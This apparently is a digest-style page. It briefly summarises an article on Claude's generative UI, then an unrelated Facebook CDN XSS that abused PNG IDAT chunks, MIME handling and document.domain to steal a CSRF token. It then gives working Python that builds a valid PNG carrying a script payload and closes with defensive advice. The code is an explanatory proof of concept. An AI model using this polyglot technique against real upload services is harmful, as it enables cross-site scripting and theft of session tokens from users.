This article reverse-engineers Claude's generative UI implementation, revealing it uses a show_widget tool call with direct DOM injection (not iframes), progressive documentation disclosure via read_me, and live HTML streaming from CDNs secured by Content Security Policy. The author then implements a similar system for pi, a terminal-based coding agent, using Glimpse (a native macOS WKWebView library) to render interactive widgets.
A critical XSS vulnerability on Facebook's CDN was exploited by encoding malicious JavaScript into PNG IDAT chunks, uploading the image as an advertisement, then requesting it with an .html extension so that it was served and interpreted as HTML (MIME sniffing). The attacker then used document.domain to reach across to www.facebook.com, read the fb_dtsg CSRF token, and bypass LinkShim protections.
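The IDAT-chunk step described above, as an added example that is not code from the original write-up: the block builds a structurally valid PNG whose single IDAT chunk contains an HTML/JavaScript payload byte-for-byte, then parses the file back to prove the CRCs check out, that the payload sits literally inside IDAT, and that the image still decodes. It uses the simplest variant of the trick, zlib level 0, so the deflate stream consists of "stored" blocks that copy the scanline unchanged; the harder variant in the literature, choosing pixel bytes that recompress to the payload so it survives an image optimiser, is not shown here. The payload string, the one-row greyscale layout and the function names are assumptions for the illustration.

```python
"""Added example (not from the original write-up): build a PNG whose IDAT chunk
carries an HTML/JavaScript payload verbatim, then verify the result.

Assumptions (hypothetical, for illustration): the payload text, a one-row
8-bit greyscale image, and zlib level 0 so the deflate stream uses 'stored'
blocks and the payload bytes appear unchanged inside IDAT.
"""
from __future__ import annotations

import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Constructed payload for the demonstration; any HTML fragment works.
PAYLOAD = b"<script>alert(document.domain)</script>"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png_with_payload(payload: bytes) -> bytes:
    """Return a valid 8-bit greyscale PNG one scanline high and wide enough to
    hold `payload` as pixel values. Filter byte 0 (None) precedes the scanline.
    zlib level 0 emits stored deflate blocks, so the IDAT data contains the
    payload literally; an image pipeline that recompresses would destroy this."""
    width, height = len(payload), 1
    # IHDR: width, height, bit depth 8, colour type 0 (grey), compression,
    # filter and interlace methods all 0.
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    scanline = b"\x00" + payload          # filter type 0 + raw pixel bytes
    idat = zlib.compress(scanline, 0)     # stored blocks: bytes copied verbatim
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def parse_chunks(png: bytes) -> list[tuple[bytes, bytes]]:
    """Walk the chunk list, checking the signature and every CRC; returns
    (type, data) pairs. Raises ValueError on structural corruption."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos < len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r}")
        chunks.append((ctype, data))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks


def payload_offset_in_idat(png: bytes, payload: bytes) -> int:
    """Offset of the literal payload inside the concatenated IDAT data, or -1."""
    idat = b"".join(d for t, d in parse_chunks(png) if t == b"IDAT")
    return idat.find(payload)


def decoded_pixels(png: bytes) -> bytes:
    """Inflate IDAT and strip the filter byte: the image's pixels are the payload."""
    idat = b"".join(d for t, d in parse_chunks(png) if t == b"IDAT")
    return zlib.decompress(idat)[1:]


def looks_like_png(body: bytes) -> bool:
    """The first thing a content-sniffing server or browser checks: the 8-byte
    signature. A server that derives Content-Type from the URL extension
    instead (the .html trick in the write-up) never consults the bytes."""
    return body[:8] == PNG_SIG


if __name__ == "__main__":
    png = build_png_with_payload(PAYLOAD)
    print("payload at IDAT offset", payload_offset_in_idat(png, PAYLOAD))
    print("image decodes back to payload:", decoded_pixels(png) == PAYLOAD)
    print("magic bytes say PNG:", looks_like_png(png))
```

The file is a real PNG by every structural check, which is why content validation on upload does not catch it; it is harmless while the response carries `Content-Type: image/png`, and only becomes HTML when the server lets the requested extension pick the type. The defensive checks a practitioner would pair with this: set the Content-Type from the validated bytes rather than the URL, send `X-Content-Type-Options: nosniff`, and host user uploads on a separate registrable domain so a `document.domain` relaxation on the main site cannot reach them.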